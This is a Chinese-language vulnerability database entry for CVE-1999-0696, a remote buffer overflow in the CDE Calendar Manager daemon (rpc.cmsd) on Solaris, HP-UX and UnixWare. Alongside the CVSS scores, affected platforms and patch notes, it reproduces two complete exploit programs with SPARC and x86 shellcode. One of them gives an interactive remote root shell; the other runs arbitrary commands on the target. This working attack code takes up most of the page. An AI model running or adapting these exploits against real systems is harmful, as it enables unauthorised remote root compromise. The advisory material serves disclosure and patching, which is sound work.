CVE-1999-0696
CVSS10.0
发布时间 :1999-07-01 00:00:00
修订时间 :2008-09-09 08:35:14
NMCOE    

[原文]Buffer overflow in CDE Calendar Manager Service Daemon (rpc.cmsd).


[CNNVD]CDE Calendar Manager Service Daemon缓冲区溢出漏洞(CNNVD-199907-004)

        CDE Calendar Manager Service Daemon (rpc.cmsd)存在缓冲区溢出漏洞。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.5
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:sun:solaris:2.6
cpe:/o:sun:sunos:4.1.3Sun SunOS 4.1.3
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:2.5.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5482Buffer overflow vulnerability in the CDE Calendar Manager Service Daemon, rpc.cmsd.
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0696
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0696
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-004
(官方数据源) CNNVD

- 其它链接及资源

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102
(UNKNOWN)  HP  HPSBUX9908-102
http://www.ciac.org/ciac/bulletins/j-051.shtml
(UNKNOWN)  CIAC  J-051
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188
(UNKNOWN)  SUN  00188

- 漏洞信息

CDE Calendar Manager Service Daemon缓冲区溢出漏洞
危急 缓冲区溢出
1999-07-01 00:00:00 2006-11-16 00:00:00
远程  
        CDE Calendar Manager Service Daemon (rpc.cmsd)存在缓冲区溢出漏洞。

- 公告与补丁

        

- 漏洞信息 (19420)

Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1) (EDBID:19420)
multiple remote
1999-07-13 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/524/info

There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise. 


/*## copyright LAST STAGE OF DELIRIUM jul 1999 poland        *://lsd-pl.net/ #*/
/*## rpc.cmsd                                                                #*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>

#define ADRNUM 1500
#define NOPNUM 1600

#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PING 0
#define CMSD_CREATE 21
#define CMSD_INSERT 6

char findsckcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>      */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>        */
    "\x7f\xff\xff\xff"     /* call    <findsckcode+4>      */
    "\xa0\x20\x3f\xff"     /* sub     %g0,-1,%l0           */
    "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2          */
    "\xa6\x10\x20\x44"     /* mov     0x44,%l3             */
    "\xa8\x10\x23\xff"     /* mov     0x3ff,%l4            */
    "\xaa\x03\xe0\x44"     /* add     %o7,68,%l5           */
    "\x81\xc5\x60\x08"     /* jmp     %l5+8                */

    "\xaa\x10\x20\xff"     /* mov     0xff,%l5             */
    "\xab\x2d\x60\x08"     /* sll     %l5,8,%l5            */
    "\xaa\x15\x60\xff"     /* or      %l5,0xff,%l5         */
    "\xe2\x03\xff\xd0"     /* ld      [%o7-48],%l1         */
    "\xac\x0c\x40\x15"     /* and     %l1,%l5,%l6          */
    "\x2b\x00\x00\x00"     /* sethi   %hi(0x00000000),%l5  */
    "\xaa\x15\x60\x00"     /* or      %l5,0x000,%l5        */
    "\xac\x05\x40\x16"     /* add     %l5,%l6,%l6          */
    "\xac\x05\xbf\xff"     /* add     %l6,-1,%l6           */
    "\x80\xa5\xbf\xff"     /* cmp     %l6,-1               */
    "\x02\xbf\xff\xf5"     /* be      <findsckcode+32>     */
    "\xaa\x03\xe0\x7c"     /* add     %o7,0x7c,%l5         */

    "\xe6\x23\xff\xc4"     /* st      %l3,[%o7-60]         */
    "\xc0\x23\xff\xc8"     /* st      %g0,[%o7-56]         */
    "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]         */
    "\x90\x04\x3f\xff"     /* add     %l0,-1,%o0           */
    "\xaa\x10\x20\x54"     /* mov     0x54,%l5             */
    "\xad\x2d\x60\x08"     /* sll     %l5,8,%l6            */
    "\x92\x15\xa0\x91"     /* or      %l6,0x91,%o1         */
    "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2          */
    "\x82\x10\x20\x36"     /* mov     0x36,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "\xa0\x24\x3f\xff"     /* sub     %l0,-1,%l0           */
    "\x1a\xbf\xff\xe9"     /* bcc     <findsckcode+36>     */
    "\x80\xa4\x23\xff"     /* cmp     %l0,0x3ff            */
    "\x04\xbf\xff\xf3"     /* bl      <findsckcode+84>     */

    "\xaa\x20\x3f\xff"     /* sub     %g0,-1,%l5           */
    "\x90\x05\x7f\xff"     /* add     %l5,-1,%o0           */
    "\x82\x10\x20\x06"     /* mov     0x6,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "\x90\x04\x3f\xfe"     /* add     %l0,-2,%o0           */
    "\x82\x10\x20\x29"     /* mov     0x29,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "\xaa\x25\x7f\xff"     /* sub     %l5,-1,%l5           */
    "\x80\xa5\x60\x03"     /* cmp     %l5,3                */
    "\x04\xbf\xff\xf8"     /* ble     <findsckcode+144>    */
    "\x80\x1c\x40\x11"     /* xor     %l1,%l1,%g0          */
;

char setuidcode[]=
    "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */
;

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
    "\x90\x03\xe0\x24"     /* add     %o7,32,%o0           */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
    "\x98\x03\xe0\x24"     /* add     %o7,32,%o4           */
    "\xc0\x23\x20\x08"     /* st      %g0,[%o4+8]          */
    "\xd0\x23\x20\x10"     /* st      %o0,[%o4+16]         */
    "\xc0\x23\x20\x14"     /* st      %g0,[%o4+20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh"
;

char cmdshellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode-4>     */
    "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode>       */
    "\x7f\xff\xff\xff"     /* call    <cmdshellcode+4>     */
    "\x90\x03\xe0\x34"     /* add     %o7,52,%o0           */
    "\x92\x23\xe0\x20"     /* sub     %o7,32,%o1           */
    "\xa2\x02\x20\x0c"     /* add     %o0,12,%l1           */
    "\xa4\x02\x20\x10"     /* add     %o0,16,%l2           */
    "\xc0\x2a\x20\x08"     /* stb     %g0,[%o0+8]          */
    "\xc0\x2a\x20\x0e"     /* stb     %g0,[%o0+14]         */
    "\xd0\x23\xff\xe0"     /* st      %o0,[%o7-32]         */
    "\xe2\x23\xff\xe4"     /* st      %l1,[%o7-28]         */
    "\xe4\x23\xff\xe8"     /* st      %l2,[%o7-24]         */
    "\xc0\x23\xff\xec"     /* st      %g0,[%o7-20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh    -c  "
;

static char nop[]="\x80\x1c\x40\x11";

typedef struct{char *target,*new_target;}req1_t;

typedef struct{
    struct{long tick,key;}appt_id;
    void *tag;
    int duration,ntimes;
    char *what;
    struct{int period,nth;long enddate;}period;
    char *author,*client_data;
    void *exception,*attr;
    int appt_status,privacy;
    void *next;
}appt_t;

typedef struct{
    char *target;
    struct{
        int tag;
        union{struct{void *v1,*v2;int i;}apptid;appt_t *appt;}args_u;
    }args;
    int pid;
}req2_t;

bool_t xdr_req1(XDR *xdrs,req1_t *obj){
    if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
    if(!xdr_string(xdrs,&obj->new_target,~0)) return(FALSE);
}

bool_t xdr_appt(XDR *xdrs,appt_t *objp){
    char *v=NULL;long l=0;int i=0;
    if(!xdr_long(xdrs,&l)) return(FALSE);
    if(!xdr_long(xdrs,&l)) return(FALSE);
    if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
    if(!xdr_int(xdrs,&i)) return(FALSE);
    if(!xdr_int(xdrs,&objp->ntimes)) return(FALSE);
    if(!xdr_string(xdrs,&objp->what,~0)) return(FALSE);
    if(!xdr_int(xdrs,&objp->period.period)) return(FALSE);
    if(!xdr_int(xdrs,&i)) return(FALSE);
    if(!xdr_long(xdrs,&l)) return(FALSE);
    if(!xdr_string(xdrs,&objp->author,~0)) return(FALSE);
    if(!xdr_string(xdrs,&objp->client_data,~0)) return(FALSE);
    if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
    if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
    if(!xdr_int(xdrs,&i)) return(FALSE);
    if(!xdr_int(xdrs,&i)) return(FALSE);
    if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
    return(TRUE);
}

bool_t xdr_req2(XDR *xdrs,req2_t *obj){
    if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
    if(!xdr_int(xdrs,&obj->args.tag)) return(FALSE);
    if(!xdr_pointer(xdrs,(char**)&obj->args.args_u.appt,sizeof(appt_t),
        xdr_appt)) return(FALSE);
    if(!xdr_int(xdrs,&obj->pid)) return(FALSE);
    return(TRUE);
}

main(int argc,char **argv){
    char buffer[30000],address[4],*b,*cmd;
    int i,c,n,flag=0,vers=7,port=0,sck;
    CLIENT *cl;enum clnt_stat stat;
    struct hostent *hp;
    struct sockaddr_in adr;
    struct timeval tm={10,0};
    req1_t req1;req2_t req2;appt_t ap;
    char calendar[32];

    printf("copyright LAST STAGE OF DELIRIUM jul 1999 poland  //lsd-pl.net/\n");
    printf("rpc.cmsd for solaris 2.5 2.5.1 2.6 2.7 sparc\n\n");

    if(argc<2){
        printf("usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]\n",
            argv[0]);
        exit(-1);
    }

    while((c=getopt(argc-1,&argv[1],"tsc:p:v:"))!=-1){
        switch(c){
        case 't': flag|=4;break;
        case 's': flag|=2;break;
        case 'c': flag|=1;cmd=optarg;break;
        case 'p': port=atoi(optarg);break;
        case 'v': vers=atoi(optarg);
        }
    }

    if(vers==5) *(unsigned long*)address=htonl(0xefffcf48+600);
    if(vers==6) *(unsigned long*)address=htonl(0xefffed0c+100);
    if(vers==7) *(unsigned long*)address=htonl(0xffbeea8c+600);

    printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
    fflush(stdout);

    adr.sin_family=AF_INET;
    adr.sin_port=htons(port);
    if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
        }
        memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
    }else{
        if((hp=gethostbyaddr((char*)&adr.sin_addr.s_addr,4,AF_INET))==NULL){
            errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
        }
    }
    if((b=(char*)strchr(hp->h_name,'.'))!=NULL) *b=0;

    if(flag&4){
        sck=RPC_ANYSOCK;
        if(!(cl=clntudp_create(&adr,CMSD_PROG,CMSD_VERS,tm,&sck))){
            clnt_pcreateerror("\nerror");exit(-1);
        }
        stat=clnt_call(cl,CMSD_PING,xdr_void,NULL,xdr_void,NULL,tm);
        if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
        clnt_destroy(cl);
        if(flag==4) {printf("sent!\n");exit(0);}
    }

    adr.sin_port=htons(port);

    sck=RPC_ANYSOCK;
    if(!(cl=clnttcp_create(&adr,CMSD_PROG,CMSD_VERS,&sck,0,0))){
        clnt_pcreateerror("\nerror");exit(-1);
    }
    cl->cl_auth=authunix_create(hp->h_name,0,0,0,NULL);

    sprintf(calendar,"xxx.XXXXXX");
    req1.target=mktemp(calendar);
    req1.new_target="";

    stat=clnt_call(cl,CMSD_CREATE,xdr_req1,&req1,xdr_void,NULL,tm);
    if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}

    b=buffer;
    for(i=0;i<ADRNUM;i++) *b++=address[i%4]; 
    *b=0;
    b=&buffer[2000];
    for(i=0;i<2;i++) *b++=0xff; 
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; 

    if(flag&2){
        i=sizeof(struct sockaddr_in);
        if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
            struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
            ioctl(sck,(('S'<<8)|2),"sockmod");
            nb.maxlen=0xffff;
            nb.len=sizeof(struct sockaddr_in);;
            nb.buf=(char*)&adr;
            ioctl(sck,(('T'<<8)|144),&nb);
        }
        n=-ntohs(adr.sin_port);
        printf("port=%d connected! ",-n);fflush(stdout);

        *((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
        *((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
        for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
        for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
        for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    }else{
        for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
        for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
        for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
        *b++=';';
        for(i=0;i<3+4-((strlen(cmd)%4));i++) *b++=0xff;
    }
    *b=0;

    ap.client_data=buffer;
    ap.what=&buffer[2000];
    ap.author="";
    ap.ntimes=1;
    ap.period.period=1;
    req2.target=calendar;
    req2.args.tag=3;
    req2.args.args_u.appt=&ap;

    stat=clnt_call(cl,CMSD_INSERT,xdr_req2,&req2,xdr_void,NULL,tm);
    if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
    printf("sent!\n");if(flag&1) exit(0);

    write(sck,"/bin/uname -a\n",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}
		

- 漏洞信息 (19421)

Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2) (EDBID:19421)
multiple remote
1999-07-13 Verified
0 jGgM
N/A [点击下载]
source: http://www.securityfocus.com/bid/524/info
 
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise. 

/*
 * Unixware 7.x rpc.cmsd exploit by jGgM
 * http://www.netemperor.com/en/
 * EMail: jggm@mail.com
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>

#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21

#define BUFFER_SIZE	1036
#define SHELL_START	1024
#define RET_LENGTH	12
#define ADJUST		100
#define NOP	0x90
#define LEN		68

char shell[] =
  /*  0 */ "\xeb\x3d"                         /* jmp springboard [2000]*/
  /* syscall:                                                    [2000]*/
  /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   [2000]*/
  /*  9 */ "\xc3"                             /* ret             [2000]*/
  /* start:                                                      [2000]*/
  /* 10 */ "\x5e"                             /* popl %esi       [2000]*/
  /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  /* 13 */ "\x89\x46\xbf"                     /* movl %eax,-0x41(%esi) */
  /* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c(%esi)  */
  /* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
  /* 22 */ "\x88\x46\x17"                     /* movb %al,0x17(%esi)   */
  /* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a(%esi)   */
  /* 28 */ "\x88\x46\xff"                     /* movb %al,0x??(%esi)   */
  /* execve:                                                     [2000]*/
  /* 31 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  /* 33 */ "\x50"                             /* pushl %eax      [2000]*/
  /* 34 */ "\x56"                             /* pushl %esi      [2000]*/
  /* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%esi),%ebx  */
  /* 38 */ "\x89\x1e"                         /* movl %ebx,(%esi)[2000]*/
  /* 40 */ "\x53"                             /* pushl %ebx      [2000]*/
  /* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%esi),%ebx  */
  /* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4(%esi)   */
  /* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%esi),%ebx  */
  /* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)   */
  /* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al  [2000]*/
  /* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall    [2000]*/
  /* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp  [2000]*/
  /* springboard:                                                [2000]*/
  /* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start      [2000]*/
  /* data:                                                       [2000]*/
  /* 68 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  /* 72 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  /* 76 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  /* 80 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA            [2000]*/
  /* 92 */ "\x2d\x63\xff";                    /* DATA            [2000]*/

struct cm_send {
   char *s1;
   char *s2;
};

struct cm_reply {
   int i;
};

bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
   if(!xdr_wrapstring(xdrs, &objp->s1))
      return (FALSE);
   if(!xdr_wrapstring(xdrs, &objp->s2))
       return (FALSE);
   return (TRUE);
}

bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
   if(!xdr_int(xdrs, &objp->i))
      return (FALSE);
   return (TRUE);
}

long get_ret() {
   return 0x8047720;
}

int
main(int argc, char *argv[])
{
   char buffer[BUFFER_SIZE + 1];
   long ret, offset;
   int len, x, y;
   char *command, *hostname;

   CLIENT *cl;
   struct cm_send send;
   struct cm_reply reply;
   struct timeval tm = { 10, 0 };
   enum clnt_stat stat;

   if(argc < 3 || argc > 4) {
      printf("Usage: %s [hostname] [command] [offset]\n", argv[0]);
      exit(1);
   } // end of if..

   hostname = argv[1];
   command = argv[2];

   if(argc == 4) offset = atol(argv[3]);
   else offset=0;

   len = strlen(command);
   len++;
   len = -len;
   shell[LEN+0] = (len >>  0) & 0xff;
   shell[LEN+1] = (len >>  8) & 0xff;
   shell[LEN+2] = (len >> 16) & 0xff;
   shell[LEN+3] = (len >> 24) & 0xff;

   shell[30] = (char)(strlen(command) + 27);

   ret = get_ret() + offset;

   for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;

   x = BUFFER_SIZE - RET_LENGTH - strlen(shell) - strlen(command) - 1 - ADJUST;

   for(y=0; y<strlen(shell); y++)
      buffer[x++] = shell[y];

   for(y=0; y<strlen(command); y++)
      buffer[x++] = command[y];

   buffer[x] = '\xff';

   x = SHELL_START;
   for(y=0; y<(RET_LENGTH/4); y++, x=x+4)
      *((int *)&buffer[x]) = ret;

   buffer[x] = 0x00;

   printf("host = %s\n", hostname);
   printf("command = '%s'\n", command);
   printf("ret address = 0x%x\n", ret);
   printf("buffer size = %d\n", strlen(buffer));

   send.s1 = buffer;
   send.s2 = "";

   cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
   if(cl == NULL) {
      clnt_pcreateerror("clnt_create");
      printf("exploit failed; unable to contact RPC server\n");
      exit(1);
   }
   cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
   stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send,
                        xdr_cm_reply, (caddr_t) &reply, tm);
   if(stat == RPC_SUCCESS) {
      printf("exploit is failed!!\n");
      clnt_destroy(cl);
      exit(1);
   } else {
      printf("Maybe, exploit is success!!\n");
      clnt_destroy(cl);
      exit(0);
   }
}
		

- 漏洞信息

7404
CDE Calendar Manager Service Daemon (rpc.cmsd) Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in rpc.cmsd. The daemon fails to check the length of a buffer before copying it resulting in a stack overflow. With a specially crafted request, an attacker can cause the daemon to execute arbitrary code resulting in a loss of integrity.

- 时间线

1999-07-16 Unknow
1999-07-16 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun Microsystems, Hewlett-Packard, Compaq, and SCO have released patches to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站